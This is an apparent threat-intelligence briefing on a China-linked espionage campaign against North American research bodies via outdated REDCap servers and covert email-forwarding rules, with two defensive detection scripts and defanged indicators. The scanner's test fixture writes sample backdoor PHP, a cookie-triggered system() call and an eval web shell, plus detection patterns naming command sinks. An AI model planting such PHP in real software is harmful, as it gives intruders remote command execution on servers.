China-linked spies spent over a year inside North American research networks

A China-linked espionage group quietly burrowed into North American universities, hospitals, and military health institutions for more than a year, stealing sensitive defense and medical research before anyone noticed, according to new research from the Google Threat Intelligence Group (GTIG).

GTIG tracks the group as UNC6508 and assesses with high confidence that it is a People's Republic of China (PRC) nexus actor motivated by espionage. The campaign fits a broader pattern in which China-linked groups account for the largest share of state-backed intrusions. The earliest known break-in dates to September 2023, and the activity continued undetected into late 2025. That long, quiet dwell time echoes other Chinese operations, including the Velvet Ant intrusion, in which the actor remained inside a victim network for years. Working with Mandiant Consulting, Google says it disrupted the attacker's infrastructure and notified the affected organizations.

Who was targeted

The victims read like a who's who of North American research: world-renowned clinical providers, premier academic centers, military health institutions, health regulators, and professional advocacy groups across the United States and Canada. Together they employ thousands of researchers and command research budgets in the billions of dollars. The attackers' collection list was broad, spanning national security and Indo-Pacific command operations, artificial intelligence, uncrewed vehicle systems, offensive cyber programs, and medical research, including a specific interest in the mosquito-borne Chikungunya virus that drove an outbreak in China's Guangdong province in 2025.

How the attack worked

The group's way in was REDCap, a web platform that medical and scientific researchers use to build study databases and surveys. UNC6508 repeatedly hunted for internet-facing REDCap servers and probed them for outdated, vulnerable releases that administrators had left in place alongside the current one. Because an older release that is never removed stays reachable on the server, an attacker can steer requests at the old, unpatched code instead of the patched version, a so-called downgrade attack. Once inside, the attackers planted a web shell (help.php) and, three months later, deployed custom malware that GTIG calls INFINITERED.

INFINITERED is built for persistence. Rather than running as a separate program, it trojanizes legitimate REDCap files and even hooks the software's own upgrade process so it can reinject itself into each new version. One component silently captures usernames and passwords as researchers log in, hiding the stolen credentials inside a normal-looking database table. Another opens a backdoor that watches for a specific value in an HTTP cookie, then runs shell commands, executes database queries, and moves files on the attacker's command.
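The two server-side conditions described above, a stale release left beside the current one and a trojanized or dropped PHP file, can both be hunted for on a copy of the REDCap web root. The script below is an added example, not GTIG's or REDCap's own code, and it is not the published YARA rule. It assumes, as a convention not taken from the report, that each release lives in a directory named redcap_vX.Y.Z under the web root and that a known-good SHA-256 manifest exists for the current release; the fixture files it builds are constructed.

```python
"""Hunt a REDCap web root for stale releases (downgrade exposure) and for
trojanized or dropped PHP files (web shell, cookie-triggered backdoor).
Added example; assumes redcap_vX.Y.Z release directories and a known-good
SHA-256 manifest for the current release. Fixture contents are constructed.
"""
import hashlib
import re
import tempfile
from pathlib import Path

VERSION_DIR = re.compile(r"^redcap_v(\d+)\.(\d+)\.(\d+)$")
# Heuristic for a cookie-triggered backdoor: a PHP file that both reads a
# cookie and reaches a command or eval sink. Not the published YARA rule.
COOKIE_READ = re.compile(r"\$_COOKIE\s*\[")
EXEC_SINK = re.compile(r"\b(shell_exec|exec|system|passthru|popen|proc_open|eval)\s*\(")

# Constructed clean contents of the current release, used to build the manifest.
CLEAN_FILES = {
    "index.php": "<?php echo 'REDCap'; ?>\n",
    "Config/init_global.php": "<?php\n// clean initialisation\n?>\n",
}


def _fmt(v):
    return ".".join(str(x) for x in v)


def find_versions(webroot):
    """Return (current, [stale ...]) release strings found under webroot."""
    found = []
    for entry in Path(webroot).iterdir():
        m = VERSION_DIR.match(entry.name)
        if m and entry.is_dir():
            found.append(tuple(int(x) for x in m.groups()))
    if not found:
        return None, []
    current = max(found)
    return _fmt(current), [_fmt(v) for v in sorted(found) if v != current]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def check_integrity(version_dir, manifest):
    """Diff the PHP files under version_dir against manifest {relpath: sha256}."""
    version_dir = Path(version_dir)
    seen = {p.relative_to(version_dir).as_posix(): sha256_file(p)
            for p in version_dir.rglob("*.php")}
    return {
        "modified": sorted(p for p, h in seen.items() if p in manifest and manifest[p] != h),
        "unexpected": sorted(p for p in seen if p not in manifest),   # e.g. a dropped web shell
        "missing": sorted(p for p in manifest if p not in seen),
    }


def scan_backdoor_patterns(version_dir):
    """Return PHP files that both read $_COOKIE and call a command/eval sink."""
    version_dir = Path(version_dir)
    hits = []
    for p in version_dir.rglob("*.php"):
        src = p.read_text(errors="replace")
        if COOKIE_READ.search(src) and EXEC_SINK.search(src):
            hits.append(p.relative_to(version_dir).as_posix())
    return sorted(hits)


def demo_manifest():
    return {p: hashlib.sha256(c.encode()).hexdigest() for p, c in CLEAN_FILES.items()}


def build_demo_webroot():
    """Constructed fixture: a stale release, a current release with one
    trojanized file, and a dropped web shell named like the one in the report."""
    root = Path(tempfile.mkdtemp(prefix="redcap_demo_"))
    (root / "redcap_v14.0.0").mkdir()                       # old release never removed
    cur = root / "redcap_v14.5.0"
    (cur / "Config").mkdir(parents=True)
    (cur / "index.php").write_text(CLEAN_FILES["index.php"])
    (cur / "Config" / "init_global.php").write_text(         # trojanized: cookie -> system()
        "<?php\nif (isset($_COOKIE['sessid2'])) { system($_COOKIE['sessid2']); }\n?>\n")
    (cur / "help.php").write_text("<?php eval(base64_decode($_POST['c'])); ?>\n")
    return root


def run_demo():
    """Run all three checks over the fixture and return their results."""
    root = build_demo_webroot()
    current, stale = find_versions(root)
    cur_dir = root / ("redcap_v" + current)
    return {
        "versions": (current, stale),
        "integrity": check_integrity(cur_dir, demo_manifest()),
        "backdoor_hits": scan_backdoor_patterns(cur_dir),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, result)
```

Note that the dropped help.php is caught by the manifest diff, not by the cookie heuristic (it is triggered through POST data, not a cookie), which is why both checks are needed: an integrity baseline for files that should not exist or should not have changed, and a content heuristic for anything the baseline cannot cover.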

A novel email-forwarding trick

The most striking part of the campaign was how the attackers stole email. More than a year after the initial break-in, UNC6508 reused harvested credentials to take over an enterprise administrator account, then abused content compliance rules, a legitimate administrative feature of cloud email suites that matches messages on keywords and applies an action to them. The attackers created a rule (misspelled "Patroit") that quietly BCC-forwarded any matching email to an attacker-controlled Gmail address, BebitaBarefoot774[at]gmail[.]com, creating a continuous, covert feed of stolen correspondence. GTIG says using compliance rules this way is a technique it had not previously seen from a PRC-nexus actor. To stay hidden, the group routed its traffic through US-based obfuscation networks made up of compromised routers, residential proxies, and other devices, so its activity appeared to originate inside the country.

What you should do

GTIG urges any organization running REDCap to update to the latest version, to fully remove older releases rather than leave them beside the current one, and to scan servers for INFINITERED using the YARA rule and indicators Google published. More broadly, defenders should enforce phishing-resistant multi-factor authentication (hardware security keys or passkeys) on administrator accounts, use unique credentials across systems so a password harvested from REDCap cannot be replayed against email or identity providers, and routinely audit email compliance and forwarding rules for unauthorized changes, exactly the kind of quiet abuse that let this campaign run for so long. Because UNC6508 created its rule from a legitimate administrator account, the rule change itself, not the account that made it, is the signal to alert on.
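The rule audit recommended above, covering the BCC-forwarding abuse described in the previous section, can be scripted once the tenant's compliance and routing rules are exported. The following is an added example, not GTIG's code and not a Google API call; the rule records are a constructed export in an assumed shape (rule name, match keywords, BCC recipients, creating account, UTC creation time), and the drop address in the sample is made up. The published exfiltration address is kept in its defanged form and compared that way, so the live address never appears in the script.

```python
"""Audit exported mail-routing rules for a content compliance rule that
silently BCCs matching mail to an outside mailbox. Added example; the
export shape, tenant domains and sample rules are assumed or constructed.
"""
from datetime import datetime, timezone

ORG_DOMAINS = {"example-hospital.org"}                   # assumed tenant domains
FREEMAIL = {"gmail.com", "outlook.com", "yahoo.com", "proton.me"}
# Exfiltration account from the GTIG report, kept defanged; recipients are
# defanged before comparison so the live address is never written here.
IOC_RECIPIENTS = {"BebitaBarefoot774[at]gmail[.]com"}
BUSINESS_HOURS_UTC = (12, 23)   # assumed working window of the tenant, in UTC

RULES = [  # constructed sample export
    {"name": "Legal hold - litigation",
     "match": ["subpoena", "litigation"],
     "bcc": ["legalhold@example-hospital.org"],
     "created_by": "it-admin@example-hospital.org",
     "created_at": "2024-03-11T14:02:00Z"},
    {"name": "Patroit",
     "match": ["grant", "proposal", "Chikungunya", "INDOPACOM"],
     "bcc": ["grantreview.archive@gmail.com"],        # constructed drop address
     "created_by": "ent-admin@example-hospital.org",   # legitimate admin, reused credentials
     "created_at": "2025-01-07T03:17:45Z"},
]


def defang(addr):
    """Render an address the way the report publishes it, for IOC comparison."""
    return addr.lower().replace("@", "[at]").replace(".", "[.]")


def matches_ioc(addr, iocs=IOC_RECIPIENTS):
    return defang(addr) in {i.lower() for i in iocs}


def domain_of(addr):
    return addr.rsplit("@", 1)[-1].lower()


def audit_rule(rule, org_domains=ORG_DOMAINS, hours=BUSINESS_HOURS_UTC):
    """Return a list of findings for one rule; an empty list means nothing suspicious."""
    findings = []
    for rcpt in rule.get("bcc", []):
        d = domain_of(rcpt)
        if matches_ioc(rcpt):
            findings.append("bcc %s matches a published IOC" % rcpt)
        if d not in org_domains:
            findings.append("bcc %s is outside the organization" % rcpt)
        if d in FREEMAIL:
            findings.append("bcc %s is a free-mail account" % rcpt)
    created = datetime.fromisoformat(rule["created_at"].replace("Z", "+00:00"))
    created = created.astimezone(timezone.utc)
    if not (hours[0] <= created.hour < hours[1]):
        findings.append("created outside business hours at %s UTC" % created.strftime("%H:%M"))
    return findings


def audit_rules(rules=RULES):
    """Map rule name -> findings for every rule that has at least one finding."""
    out = {}
    for rule in rules:
        findings = audit_rule(rule)
        if findings:
            out[rule["name"]] = findings
    return out


if __name__ == "__main__":
    for name, findings in audit_rules().items():
        print(name)
        for f in findings:
            print("  -", f)
```

The creating account is deliberately not used as a signal: in this campaign the rule was made from a real administrator account, so the recipient domain, the timing and a match against published indicators carry the weight. Running the audit on every rule change, rather than on a schedule, is what turns it from a periodic clean-up into detection.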

Indicators of compromise

Selected defanged indicators from GTIG's report: exfiltration account BebitaBarefoot774[at]gmail[.]com; admin login source 23[.]169[.]65[.]49 (a compromised ASUS router); INFINITERED backdoor SHA256 8f0158855a656b629ca76ebca565f18bc25563ded34b65d6771632c20edb68ec; credential harvester SHA256 db65c1b9f9e4cb4d729f45ad4b6fcf3e277caf9eb4c875425dec93fd883f9136; dropper SHA256 51a57bfc9ed3eb6451c1c289607814d59e1698c666fb97ac5f694c398f23d045; web shell help.php SHA256 ba6b73b0ca0dc7f86b3b397893ac32d729fd53f9df20643288f141f29d020af7. See the original GTIG report for the full indicator list and YARA rule.

This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.
